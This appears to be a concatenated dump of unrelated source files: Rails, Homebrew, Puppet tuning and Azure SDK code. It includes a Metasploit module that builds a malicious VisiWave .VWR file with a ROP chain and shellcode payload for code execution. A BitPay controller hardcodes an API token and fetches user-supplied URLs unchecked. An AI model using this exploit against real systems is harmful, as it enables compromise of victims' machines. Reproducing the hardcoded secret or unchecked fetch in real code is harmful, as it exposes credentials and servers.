if current_user.bitpay_invoices.find_by_name("sign_up") == nil
create_invoice
end
tx_id = current_user.bitpay_invoices.find_by_name("sign_up")
response = HTTParty.get("https://test.bitpay.com/invoices/#{tx_id.bitpay_invoice}")
body = JSON.parse(response.body)
if body["error"] || body["data"]["status"] == "expired"
tx_id.destroy
elsif body["data"]["status"] == "confirmed"
tx_id.paid = true
current_user.active = true;
tx_id.save
current_user.save
redirect_to root_path
end
end
def dashboard
if user_signed_in?
@personal_downloads = current_user.downloads
end
@public_downloads = Download.where({user_id: nil}).limit(10)
end
def download
@input_file = params["file"]
@returned_file = save_to_tempfile(@input_file)
@opened_file = TorrentFile.open @returned_file
@output_hash = @opened_file.to_h
if @output_hash["info"]["length"]
@size = @output_hash["info"]["length"]
else
@size = 0
@output_hash["info"]["files"].each { |targ| @size += targ["length"]}
end
@size = @size / 1000000000.0
@name = @output_hash["info"]["name"]
if user_signed_in? && current_user.bitpay_invoices
@user_purchase = current_user.bitpay_invoices.find_by_name(@name)
if @user_purchase && @user_purchase.paid
redirect_to dashboard_path
return
end
else
@public_purchase = BitpayInvoice.find_by_name(@name)
if @public_purchase && @public_purchase.paid
redirect_to dashboard_path
return
end
end
if user_signed_in?
@total_price = (0.03 + 0.09) * @size
else
@total_price = (0.025) + (0.03 + 0.09) * @size
end
@total_price = @total_price.round(2)
if BitpayInvoice.find_by_name(@name)
tx_id = BitpayInvoice.find_by_name(@name)
response = HTTParty.get("https://test.bitpay.com/invoices/#{tx_id.bitpay_invoice}")
body = JSON.parse(response.body)
if body["error"] || body["data"]["status"] == "expired"
tx_id.destroy
dl = Download.find_by_name(@name).destroy
create_payment(@total_price, @name, params["file"])
elsif body["data"]["status"] == "complete" || body["data"]["status"] == "confirmed"
dl = Download.find_by_name(@name)
tx_id.paid = true
dl.status = "Beginning download"
tx_id.save
dl.save
trigger_download(dl)
end
else
create_payment(@total_price, @name, params["file"])
end
end
def trigger_download(dl)
dl.status = "Downloading"
dl.save
#directory = Dir.mkdir(Rails.public_path + '/' + Digest::MD5.hexdigest(dl.name))
#bt = RubyTorrent::BitTorrent.new(filename, directory)
#thread = Thread.new do
#until bt.complete?
#puts "#{bt.percent_completed}% done"
#sleep 5
#end
#end
#bt.on_event(self, :complete) { complete_download(dl) }
end
def complete_download(dl)
dl.downloaded_at = Time.now
dl.status = "Downloaded"
dl.save
end
def save_to_tempfile(url)
uri = URI.parse(url)
Net::HTTP.start(uri.host, uri.port) do |http|
resp = http.get(uri.path)
file = Tempfile.new(['temp','.torrent'], Dir.tmpdir)
file.binmode
file.write(resp.body)
file.flush
file
end
end
def create_payment(total_price, name, url)
response = HTTParty.post("https://test.bitpay.com/invoices", body: {"token" => "5F4A71wnHnMAZd69Gs7TJHzEEQsxyBL3RsVEtbgpGYs2", "price" => total_price, "currency" => "USD", "transactionSpeed" => "high"})
body = JSON.parse(response.body)
if user_signed_in?
invoice = BitpayInvoice.create(user_id: current_user.id, bitpay_invoice: body["data"]["id"], name: name)
download = Download.create(user_id: current_user.id, torrent_url: url, name: name, status: "Awaiting payment")
else
invoice = BitpayInvoice.create(bitpay_invoice: body["data"]["id"], name: name)
download = Download.create(torrent_url: url, name: name, status: "Awaiting payment")
end
invoice.save
download.save
end
def create_invoice
response = HTTParty.post("https://test.bitpay.com/invoices", body: {"token" => "5F4A71wnHnMAZd69Gs7TJHzEEQsxyBL3RsVEtbgpGYs2", "price" => "0.25", "currency" => "USD", "transactionSpeed" => "high"})
body = JSON.parse(response.body)
invoice = BitpayInvoice.create(user_id: current_user.id, bitpay_invoice: body["data"]["id"], name: "sign_up")
invoice.save
end
end
| 31.013986 | 204 | 0.67779 |
91ba8e6300180d9a603e0c8ab304fe2c66af764e | 1,398 | class Wimlib < Formula
desc "Library to create, extract, and modify Windows Imaging files"
homepage "https://wimlib.net/"
url "https://wimlib.net/downloads/wimlib-1.10.0.tar.gz"
sha256 "989b1b02f246c480dec10469374f4235d15a3d5e5ae054452405305af5007f55"
bottle do
cellar :any
sha256 "820662984db7e93d3a437a1e9a04a4dc52d66ca12caef609a51438e636477348" => :sierra
sha256 "01953339d96184ffadd03080f40d71238f106d820965ddf8147d412fb3b711d5" => :el_capitan
sha256 "1708e5941ec5985f5575f41da85893ba05b898dfbb562eee1433163225ec783f" => :yosemite
end
depends_on "pkg-config" => :build
depends_on "homebrew/fuse/ntfs-3g" => :optional
depends_on "openssl"
def install
# fuse requires librt, unavailable on OSX
args = %W[
--disable-debug
--disable-dependency-tracking
--disable-silent-rules
--without-fuse
--prefix=#{prefix}
]
args << "--without-ntfs-3g" if build.without? "ntfs-3g"
system "./configure", *args
system "make", "install"
end
test do
# make a directory containing a dummy 1M file
mkdir("foo")
system "dd", "if=/dev/random", "of=foo/bar", "bs=1m", "count=1"
# capture an image
ENV.append "WIMLIB_IMAGEX_USE_UTF8", "1"
system "#{bin}/wimcapture", "foo", "bar.wim"
assert File.exist?("bar.wim")
# get info on the image
system "#{bin}/wiminfo", "bar.wim"
end
end
| 29.125 | 92 | 0.690272 |
916b4c102ff25ce7668a1237b3972b61a4a954a0 | 4,857 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VisiWave VWR File Parsing Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in VisiWave's Site Survey Report application.
When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
'Image'), but if a match isn't found, the function that's supposed to handle this routine
ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10]
instruction. This allows attackers to overwrite it with any arbitrary value, resulting in code
execution. A patch is available at visiwave.com; the fix is done by XORing the return value as
null if no match is found, and then it is validated before use.
NOTE: During installation, the application registers two file handlers, VWS and VWR, and allows a
victim user to 'double click' the malicious VWR file and execute code. This module was also built
to bypass ASLR and DEP.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # original discovery & msf exploit
'TecR0c' # msf exploit
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2011-2386' ],
[ 'OSVDB', '72464'],
[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
],
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/Windows 7 SP0',
{
'Offset' => 3981, # offset to rop gadgets
'Pointer' => 0x007AF938, # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 20 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.vwr']),
], self.class)
end
def exploit
# Allowing nulls in our rop chain is like giving gold to midas.
# instructions taken from the application's non-ASLR modules
# libcurl.dll, VisiWaveReport.exe and blah blah
rop_gadgets =
[
0x1001AFBD, # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
0xc0fff333, # junk
0xc0fff333, # junk
0x000004cf, # lwSize 1231 bytes
0x100017DD, # POP ECX; RETN
0x10037a60, # Writeable address from .data of libcurl.dll
0x10011104, # POP EDX; RETN
0x00000040, # RWX for VirtualProtect()
0x10026E4D, # MOV EAX,EDI # POP EDI # RETN
0x10002ac6, # RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x10022641, # ADD EAX, 20; RETN
0x004048B1, # XCHG EAX,EBP
0x1001BD3F, # POP EAX; RETN
0x10032048, # IAT Address - constant pointer to VirtualProtect()
0x1000FA4A, # MOV EAX,DWORD PTR DS:[EAX]; RETN
0x00657fd7, # XCHG EAX,ESI; RETN
0x1000af40, # PUSHAD; RET
].pack("V*")
# grab the pointer to our buffer
pointer = [target["Pointer"]].pack("V")
sploit = pointer # begin life in EDX
sploit << rand_text_alphanumeric(target["Offset"]) # massive offset
sploit << rop_gadgets # rop chain
sploit << make_nops(300) # safe landing
sploit << payload.encoded # profit!
vwr_data = "FileType: SSREPORT\r\n"
vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
vwr_data << "FileVersion: 10\r\n"
vwr_data << "Item: Global Properties\r\n"
vwr_data << "Checked: 1\r\n"
vwr_data << "Type: #{sploit}\r\n"
vwr_data << "SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws\r\n"
vwr_data << "FloorPlanImageReport: C:\\WINDOWS\\Web\\bullet.gif\r\n"
vwr_data << "DefaultOrientation: 0\r\n"
vwr_data << "Header:\r\n"
vwr_data << "Footer:\r\n"
vwr_data << "LeftMargin: 100\r\n"
vwr_data << "RightMargin: 100\r\n"
vwr_data << "TopMargin: 50\r\n"
vwr_data << "BottomMargin: 50\r\n"
vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
vwr_data << "Checked: 1\r\n"
print_status("Creating '#{datastore['FILENAME']}'...")
file_create(vwr_data)
end
end
| 34.942446 | 114 | 0.64546 |
bb3d9815065c492f0f232c4e0f573d3594ac4e6f | 1,359 | require "rails"
require "rails/generators"
require "rails/generators/active_record"
module Hayfork
module Generators
class CreateOrReplaceMigration < Rails::Generators::Actions::CreateMigration
def initialize(base, destination, data, config = {})
config[:force] = true
super
end
def identical?
false
end
end
module CreateOrReplaceMigrationConcern
def create_migration(destination, data, config = {}, &block)
action CreateOrReplaceMigration.new(self, destination, block || data.to_s, config)
end
end
class RebuildGenerator < ActiveRecord::Generators::Base
include CreateOrReplaceMigrationConcern
source_root File.expand_path("templates", __dir__)
# `argument :name` is defined in ::NamedBase,
# but we override it to provide a default value.
argument :name, type: :string, default: "haystack"
def copy_migration
migration_template "migrations/rebuild.rb", "#{db_migrate_path}/rebuild_#{table_name}.rb", migration_version: migration_version
end
def table_name
return "haystack" if class_name == "Haystack"
super
end
def migration_version
return unless Rails::VERSION::MAJOR >= 5
"[#{Rails::VERSION::MAJOR}.#{Rails::VERSION::MINOR}]"
end
end
end
end
| 27.18 | 135 | 0.671818 |
7915200e188d4e770bed8bf76445b2cef2538409 | 20,023 | # Note: Calculate the number of jrubies by the number of jrubies that will fit into RAM rather than CPU.
module PuppetX
module Puppetlabs
# Query infrastructure and show current, or calculate optimized settings.
class Tune
# Calculate optimized settings.
class Calculate
# Calculon Compute!
def initialize(options)
@defaults = {}
# For use when estimating capacity.
@defaults[:compile_time_factor] = 2
# Round up when memory is close to the next level of our leveled settings. See fit_to_memory().
@defaults[:fit_to_memory_percentage] = 5
# Memory reserved for the operating system (and other applications).
@defaults[:memory_reserved_for_os_percentage] = 0.20
@options = {}
# Users may override these defaults via command line options.
@options[:memory_per_jruby] = options[:memory_per_jruby] || 0
@options[:memory_reserved_for_os] = options[:memory_reserved_for_os] || 0
Puppet.debug("Using optional #{@options[:memory_per_jruby]} MB RAM per JRuby") if @options[:memory_per_jruby] != 0
Puppet.debug("Using optional #{@options[:memory_reserved_for_os]} MB RAM reserved for the operating system") if @options[:memory_reserved_for_os] != 0
end
#
# PE Infrastructure Roles
#
# Masters, Replicas, and Compilers, in Monolithic or Split Infrastructures
# Services: pe-puppetserver and (optionally) all other services.
# Levels and ratios model https://puppet.com/docs/pe/latest/configuring/tuning_monolithic.html
def calculate_master_settings(node)
percent_cpu_puppetdb = 0.25
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = (node['resources']['cpu'] * 0.50).to_i
minimum_cpu_puppetserver = 2
maximum_cpu_puppetserver = 24
percent_ram_database = 0.25
percent_ram_puppetdb = 0.10
percent_ram_orchestrator = 0.08
percent_ram_console = 0.08
percent_ram_activemq = 0.08
minimum_ram_puppetserver = 512
minimum_ram_code_cache = 96
maximum_ram_code_cache = 2048
ram_per_jruby = fit_to_memory(node['resources']['ram'], 512, 768, 1024)
ram_per_jruby_code_cache = 96
minimum_ram_database = 2048
maximum_ram_database = 16384
minimum_ram_puppetdb = 512
maximum_ram_puppetdb = 8192
minimum_ram_orchestrator = 512
maximum_ram_orchestrator = 1024
minimum_ram_console = 512
maximum_ram_console = 1024
minimum_ram_activemq = 256
maximum_ram_activemq = 512
cpu_reserved = 1
ram_reserved = select_reserved_memory(node['resources']['ram'])
# https://github.com/puppetlabs/puppet-enterprise-modules/blob/irving/modules/puppet_enterprise/manifests/profile/database.pp
default_database_max_connections = 400
percent_databse_connections = 1.10
settings = initialize_settings(node)
# Optionally use memory_per_jruby, if defined.
ram_per_jruby = @options[:memory_per_jruby] if @options[:memory_per_jruby] != 0
# Optionally use current_memory_per_jruby, if defined.
ram_per_jruby = node['current_memory_per_jruby'] if node['current_memory_per_jruby'] && node['current_memory_per_jruby'] != 0
# Reallocate resources between puppetserver and puppetdb, if this host is a monolithic master or replica master, with compile masters or compilers.
if node['type']['is_monolithic_master'] || node['type']['is_replica_master']
if node['infrastructure']['with_compile_masters']
percent_cpu_puppetdb = 0.50
percent_ram_puppetdb = 0.15
end
end
# ORCH-2384: Orchestrator in PE 2019.2 has jrubies, and requires (estimated) one processor and additional memory.
# Reallocate the processor associated with one jruby from puppetserver to orchestrator.
if node['classes']['orchestrator'] && node['type']['with_orchestrator_jruby']
cpu_reserved += 1
end
# The Vegas Renormalization: allow for testing with vmpooler (2 CPU / 6 GB RAM) VMs.
if node['resources']['cpu'] < 3
minimum_cpu_puppetserver = 1
maximum_cpu_puppetserver = 1
cpu_reserved = 1
ram_reserved = 256
end
# Do not allocate memory for reserved_code_cache, depending upon jruby version.
unless node['type']['with_jruby9k_enabled']
minimum_ram_code_cache = 0
ram_per_jruby_code_cache = 0
end
# Allocate processors and memory for PE Infrastructure services ...
if node['classes']['database']
ram_database = (node['resources']['ram'] * percent_ram_database).to_i.clamp(minimum_ram_database, maximum_ram_database)
settings['params']['puppet_enterprise::profile::database::shared_buffers'] = "#{ram_database}MB"
settings['totals']['RAM']['used'] += ram_database
end
if node['classes']['puppetdb']
# Reallocate resources between puppetserver and puppetdb, if this host is a compiler (puppetserver plus puppetdb).
if node['type']['is_compile_master'] || node['type']['is_compiler']
percent_cpu_puppetdb = 0.25
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = 3
end
command_processing_threads = (node['resources']['cpu'] * percent_cpu_puppetdb).to_i.clamp(minimum_cpu_puppetdb, maximum_cpu_puppetdb)
settings['params']['puppet_enterprise::puppetdb::command_processing_threads'] = command_processing_threads
settings['totals']['CPU']['used'] += command_processing_threads
ram_puppetdb = (node['resources']['ram'] * percent_ram_puppetdb).to_i.clamp(minimum_ram_puppetdb, maximum_ram_puppetdb)
settings['params']['puppet_enterprise::profile::puppetdb::java_args'] = { 'Xms' => "#{ram_puppetdb}m", 'Xmx' => "#{ram_puppetdb}m" }
settings['totals']['RAM']['used'] += ram_puppetdb
end
if node['classes']['orchestrator']
ram_orchestrator = (node['resources']['ram'] * percent_ram_orchestrator).to_i.clamp(minimum_ram_orchestrator, maximum_ram_orchestrator)
if node['type']['with_orchestrator_jruby']
# ORCH-2384: Orchestrator in PE 2019.2 has jrubies, and requires (estimated) one processor and additional memory.
# Reallocate the memory associated with one jruby from puppetserver to orchestrator.
ram_orchestrator += ram_per_jruby + ram_per_jruby_code_cache
# orchestrator_jruby_max_active_instances = 8
# ram_orchestrator_code_cache = orchestrator_jruby_max_active_instances * ram_per_jruby_code_cache
# settings['params']['puppet_enterprise::profile::orchestrator::jruby_max_active_instances'] = orchestrator_jruby_max_active_instances
# Note: orchestrator_jruby_max_active_instances is not a dedicated allocation, do not add it to settings['totals']['CPU']['used'].
# settings['params']['puppet_enterprise::profile::orchestrator::reserved_code_cache'] = ram_orchestrator_code_cache
# settings['totals']['RAM']['used'] += ram_orchestrator_code_cache
end
settings['params']['puppet_enterprise::profile::orchestrator::java_args'] = { 'Xms' => "#{ram_orchestrator}m", 'Xmx' => "#{ram_orchestrator}m" }
settings['totals']['RAM']['used'] += ram_orchestrator
end
if node['classes']['console']
ram_console = (node['resources']['ram'] * percent_ram_console).to_i.clamp(minimum_ram_console, maximum_ram_console)
settings['params']['puppet_enterprise::profile::console::java_args'] = { 'Xms' => "#{ram_console}m", 'Xmx' => "#{ram_console}m" }
settings['totals']['RAM']['used'] += ram_console
end
if node['classes']['amq::broker']
ram_activemq = (node['resources']['ram'] * percent_ram_activemq).to_i.clamp(minimum_ram_activemq, maximum_ram_activemq)
settings['params']['puppet_enterprise::profile::amq::broker::heap_mb'] = ram_activemq
settings['totals']['RAM']['used'] += ram_activemq
end
# Note: puppetserver is not allocated a percentage of memory: it is initially allocated all unused memory.
ram_puppetserver = (node['resources']['ram'] - ram_reserved - settings['totals']['RAM']['used'])
if ram_puppetserver < (minimum_ram_puppetserver + minimum_ram_code_cache)
Puppet.debug("Error: available memory for puppetserver: #{ram_puppetserver} MB is less than minimum required: #{minimum_ram_puppetserver} + #{minimum_ram_code_cache} MB")
return
end
# Note: jruby_max_active_instances is constrained based on both how many jrubies fit into unallocated memory and unallocated processors.
maximum_cpu_puppetserver = (node['resources']['cpu'] - cpu_reserved - settings['totals']['CPU']['used']).clamp(minimum_cpu_puppetserver, maximum_cpu_puppetserver)
max_jrubies_in_ram_puppetserver = (ram_puppetserver / (ram_per_jruby + ram_per_jruby_code_cache)).to_i
puppetserver_jruby_max_active_instances = max_jrubies_in_ram_puppetserver.clamp(minimum_cpu_puppetserver, maximum_cpu_puppetserver)
settings['params']['puppet_enterprise::master::puppetserver::jruby_max_active_instances'] = puppetserver_jruby_max_active_instances
settings['totals']['CPU']['used'] += puppetserver_jruby_max_active_instances
ram_puppetserver = [minimum_ram_puppetserver, (puppetserver_jruby_max_active_instances * ram_per_jruby)].max
settings['params']['puppet_enterprise::profile::master::java_args'] = { 'Xms' => "#{ram_puppetserver}m", 'Xmx' => "#{ram_puppetserver}m" }
settings['totals']['RAM']['used'] += ram_puppetserver
if node['type']['with_jruby9k_enabled']
code_cache_based_upon_jrubies = puppetserver_jruby_max_active_instances * ram_per_jruby_code_cache
ram_puppetserver_code_cache = code_cache_based_upon_jrubies.clamp(minimum_ram_code_cache, maximum_ram_code_cache)
settings['params']['puppet_enterprise::master::puppetserver::reserved_code_cache'] = "#{ram_puppetserver_code_cache}m"
settings['totals']['RAM']['used'] += ram_puppetserver_code_cache
end
settings['totals']['MB_PER_JRUBY'] = ram_per_jruby
# Detune puppetdb to avoid making too many connections to the database and disable garbage collection, if this host is a compiler (puppetserver with puppetdb).
if node['classes']['puppetdb'] && (node['type']['is_compile_master'] || node['type']['is_compiler'])
read_maximum_pool_size = puppetserver_jruby_max_active_instances + [1, (puppetserver_jruby_max_active_instances / 2).to_i].max
write_maximum_pool_size = (command_processing_threads * 2)
settings['params']['puppet_enterprise::puppetdb::read_maximum_pool_size'] = read_maximum_pool_size
settings['params']['puppet_enterprise::puppetdb::write_maximum_pool_size'] = write_maximum_pool_size
settings['params']['puppet_enterprise::profile::puppetdb::gc_interval'] = 0
end
# Increase max_connections when a large number of connections from compilers exceeds the default.
if node['classes']['database'] && node['infrastructure']['compiler_connections']
if node['infrastructure']['compiler_connections'] > default_database_max_connections
settings['params']['puppet_enterprise::profile::database::max_connections'] = (node['infrastructure']['compiler_connections'] * percent_databse_connections).to_i
end
end
# Do not return any settings when overallocating.
if settings['totals']['CPU']['used'] > settings['totals']['CPU']['total']
Puppet.debug("Error: calculations overallocated processors: #{settings}")
return
end
if (settings['totals']['RAM']['used'] + ram_reserved) > settings['totals']['RAM']['total']
Puppet.debug("Error: calculations overallocated memory: #{settings}")
return
end
settings
end
# Console Hosts in Split Infrastructures
# Services: pe-console-services
def calculate_console_settings(node)
percent_ram_console = 0.75
minimum_ram_console = 512
maximum_ram_console = 4096
settings = initialize_settings(node)
ram_console = (node['resources']['ram'] * percent_ram_console).to_i.clamp(minimum_ram_console, maximum_ram_console)
settings['params']['puppet_enterprise::profile::console::java_args'] = { 'Xms' => "#{ram_console}m", 'Xmx' => "#{ram_console}m" }
settings['totals']['RAM']['used'] += ram_console
settings
end
# PuppetDB Hosts in Split Infrastructures
# Services: pe-puppetdb and (by default, but optionally) pe-postgresql
def calculate_puppetdb_settings(node)
percent_cpu_puppetdb = 0.50
minimum_cpu_puppetdb = 1
maximum_cpu_puppetdb = (node['resources']['cpu'] * percent_cpu_puppetdb).to_i
percent_ram_puppetdb = 0.50
minimum_ram_puppetdb = 512
maximum_ram_puppetdb = 8192
settings = initialize_settings(node)
if node['classes']['database']
percent_ram_puppetdb = 0.25
database_settings = calculate_database_settings(node)
settings['params'].merge!(database_settings['params'])
settings['totals']['CPU']['used'] += database_settings['totals']['CPU']['used']
settings['totals']['RAM']['used'] += database_settings['totals']['RAM']['used']
end
command_processing_threads = [minimum_cpu_puppetdb, maximum_cpu_puppetdb].max
settings['params']['puppet_enterprise::puppetdb::command_processing_threads'] = command_processing_threads
settings['totals']['CPU']['used'] += command_processing_threads
ram_puppetdb = (node['resources']['ram'] * percent_ram_puppetdb).to_i.clamp(minimum_ram_puppetdb, maximum_ram_puppetdb)
settings['params']['puppet_enterprise::profile::puppetdb::java_args'] = { 'Xms' => "#{ram_puppetdb}m", 'Xmx' => "#{ram_puppetdb}m" }
settings['totals']['RAM']['used'] += ram_puppetdb
settings
end
# External PostgreSQL Hosts in Monolithic and/or PuppetDB Hosts in Split Infrastructures
# Services: pe-postgresql
def calculate_database_settings(node)
percent_ram_database = 0.25
minimum_ram_database = 2048
maximum_ram_database = 16384
# https://github.com/puppetlabs/puppet-enterprise-modules/blob/irving/modules/puppet_enterprise/manifests/profile/database.pp
default_database_max_connections = 400
percent_databse_connections = 1.10
settings = initialize_settings(node)
ram_database = (node['resources']['ram'] * percent_ram_database).to_i.clamp(minimum_ram_database, maximum_ram_database)
settings['params']['puppet_enterprise::profile::database::shared_buffers'] = "#{ram_database}MB"
settings['totals']['RAM']['used'] += ram_database
# Increase max_connections when a large number of connections from compilers exceeds the default.
if node['infrastructure']['compiler_connections']
if node['infrastructure']['compiler_connections'] > default_database_max_connections
settings['params']['puppet_enterprise::profile::database::max_connections'] = (node['infrastructure']['compiler_connections'] * percent_databse_connections).to_i
end
end
settings
end
# Return a new settings structure.
def initialize_settings(node)
{
'params' => {},
'totals' => {
'CPU' => { 'total' => node['resources']['cpu'], 'used' => 0 },
'RAM' => { 'total' => node['resources']['ram'], 'used' => 0 },
},
}
end
#
# Utilities
#
# Estimate a reasonable sample of agent runs based upon node count and run interval.
def calculate_run_sample(active_nodes, run_interval)
maximum = 10000
seconds_per_day = 86400
# If running continuously ...
return [active_nodes, maximum].min if run_interval.zero?
runs_per_day = (seconds_per_day / run_interval).to_i
# If running less than once per day ...
return [active_nodes * 7, maximum].min if runs_per_day < 1
[active_nodes * runs_per_day, maximum].min
end
# Little's Law
#
# L = λ * W
#
# Where:
#
# L = Number of requests in the queue.
# λ = Average effective arrival rate of requests.
# W = Average time spent processing a request.
  # Estimate the theoretical maximum number of nodes that can be managed by an infrastructure.
def calculate_maximum_nodes(average_compile_time, available_jrubies, run_interval)
jruby_lock_time = average_compile_time.to_f * @defaults[:compile_time_factor]
((run_interval.to_f * available_jrubies.to_f) / jruby_lock_time.to_f).ceil
end
# Estimate the theoretical minimum number of jrubies required to manage an infrastructure.
def calculate_minimum_jrubies(active_nodes, average_compile_time, run_interval)
jruby_lock_time = average_compile_time.to_f * @defaults[:compile_time_factor]
((active_nodes.to_f * jruby_lock_time.to_f) / run_interval.to_f).ceil
end
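  # A minimal worked example of the two estimates above (illustrative numbers;
  # @defaults[:compile_time_factor] is not shown in this excerpt, so a value of 2
  # is assumed here): with an average compile time of 10 seconds, jruby_lock_time
  # is 20, and with 12 available jrubies and a 1800 second run interval:
  #
  #   calculate_maximum_nodes(10, 12, 1800)     # ((1800 * 12) / 20).ceil  => 1080 nodes
  #   calculate_minimum_jrubies(1080, 10, 1800) # ((1080 * 20) / 1800).ceil => 12 jrubies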
# Return the option or the default.
def select_reserved_memory(memory)
return @options[:memory_reserved_for_os] if @options[:memory_reserved_for_os] != 0
(memory * @defaults[:memory_reserved_for_os_percentage]).to_i
end
# Model https://puppet.com/docs/pe/latest/configuring/tuning_monolithic.html
def fit_to_memory(memory, small, medium, large)
# Round up to the nearest power of two (31500 -> 32768) if within a percentage.
target_memory = nearest_power_of_two(memory)
if (memory < target_memory) && within_percent?(memory, target_memory, @defaults[:fit_to_memory_percentage])
Puppet.debug("Rounding #{memory} up to #{target_memory} for fit_to_memory")
memory = target_memory
end
return small if memory <= 8192
return medium if memory <= 16384
return medium if memory < 32768
Puppet.debug('Using a maximum value for fit_to_memory')
return large if memory >= 32768
end
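  # For illustration (assuming @defaults[:fit_to_memory_percentage] is 10, which is
  # not shown in this excerpt): fit_to_memory(30000, 'S', 'M', 'L') rounds 30000 up
  # to the nearest power of two, 32768, because it is within 10 percent of it, and
  # therefore returns 'L'; fit_to_memory(12288, 'S', 'M', 'L') returns 'M'.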
# Test if a number is within a percentage of another number.
def within_percent?(actual, target, percentage)
return false if actual == target
(Float(target - actual) / target * 100).ceil <= percentage
end
  # Return the nearest power of two to the given number.
def nearest_power_of_two(number)
return 0 if number <= 0
exponent = Math.log2 number
higher_power = 2**exponent.ceil
lower_power = 2**exponent.floor
((higher_power - number) <= (number - lower_power)) ? higher_power : lower_power
end
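  # For illustration: nearest_power_of_two(31500) => 32768 (the case mentioned in
  # fit_to_memory above), nearest_power_of_two(12288) => 16384 (ties go to the
  # higher power), and nearest_power_of_two(0) => 0.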
end
end
end
end
| 47.67381 | 182 | 0.650052 |
d58e88526ef0e7fa29061249fac18451dab96851 | 454 | cask 'navicat-for-oracle' do
version '15.0.4'
sha256 '93853defa51d98b659de55a0f313b8034399fd2ad81a9bafabd0704aae63c5ad'
url "http://download.navicat.com/download/navicat#{version.major_minor.no_dots}_ora_en.dmg"
appcast 'https://updater.navicat.com/mac/navicat_updates.php?appName=Navicat%20for%20Oracle&appLang=en'
name 'Navicat for Oracle'
homepage 'https://www.navicat.com/products/navicat-for-oracle'
app 'Navicat for Oracle.app'
end
| 37.833333 | 105 | 0.790749 |
28f6e6f4617f6b1ecea34ef5a77a1ff4472741af | 1,635 | require 'rails_helper'
RSpec.describe Offboard::RemoveSuppliersFromLots do
it 'raises an error if the expected headers are not present' do
bad_headers_csv_path = Rails.root.join('spec', 'fixtures', 'framework_suppliers_bad_headers.csv')
expect { Offboard::RemoveSuppliersFromLots.new(bad_headers_csv_path) }.to raise_error(
ArgumentError, /Missing headers in CSV file: salesforce_id/
)
end
describe '#run' do
let(:csv_path) { Rails.root.join('spec', 'fixtures', 'suppliers-to-offboard-from-framework-lots.csv') }
let(:offboarder) { Offboard::RemoveSuppliersFromLots.new(csv_path, logger: Logger.new('/dev/null')) }
let!(:framework) do
FactoryBot.create(:framework, short_name: 'FM1234')
end
let(:lot_1) { framework.lots.create!(number: '1') }
let(:lot_2a) { framework.lots.create!(number: '2a') }
let!(:supplier) do
FactoryBot.create(:supplier, salesforce_id: '001b000003FAKEFAKE')
end
let!(:agreement) do
FactoryBot.create(:agreement, supplier: supplier, framework: framework) do |agreement|
[lot_1, lot_2a].each do |framework_lot|
agreement.agreement_framework_lots.create!(framework_lot: framework_lot)
end
end
end
it 'offboards the suppliers' do
expect { offboarder.run }.to change { agreement.agreement_framework_lots.count }.by(-1)
end
context 'when the CSV references a framework that is not published' do
it 'raises an error' do
framework.update(published: false)
expect { offboarder.run }.to raise_error(ActiveRecord::RecordNotFound)
end
end
end
end
| 34.0625 | 107 | 0.697248 |
5d13e1d5c401ca1830ffe96cecc6bc6dfce5e35c | 1,268 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'roadie_actionmailer/version'
Gem::Specification.new do |spec|
spec.name = "roadie_actionmailer"
spec.version = RoadieActionmailer::VERSION
spec.authors = ["Tomáš Celizna", "Asger Behncke Jacobsen"]
spec.email = ["[email protected]", "[email protected]"]
spec.summary = %q{ActionMailer interceptor to inline CSS using the Roadie gem.}
spec.description = %q{ActionMailer interceptor to inline CSS using the Roadie gem.}
spec.homepage = "https://github.com/tomasc/roadie_actionmailer"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "rails", ">= 3"
spec.add_dependency "roadie"
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
spec.add_development_dependency "coveralls"
spec.add_development_dependency "guard"
spec.add_development_dependency "guard-minitest"
spec.add_development_dependency "minitest"
end
| 40.903226 | 87 | 0.708202 |
e95f96325dcaba4b82fbc0593aa9f080fb2fae3f | 23,851 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ADHybridHealthService::Mgmt::V2014_01_01
#
# REST APIs for Azure Active Directory Connect Health
#
class AddsServiceMembersOperations
include MsRestAzure
#
# Creates and initializes a new instance of the AddsServiceMembersOperations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [ADHybridHealthService] reference to the ADHybridHealthService
attr_reader :client
#
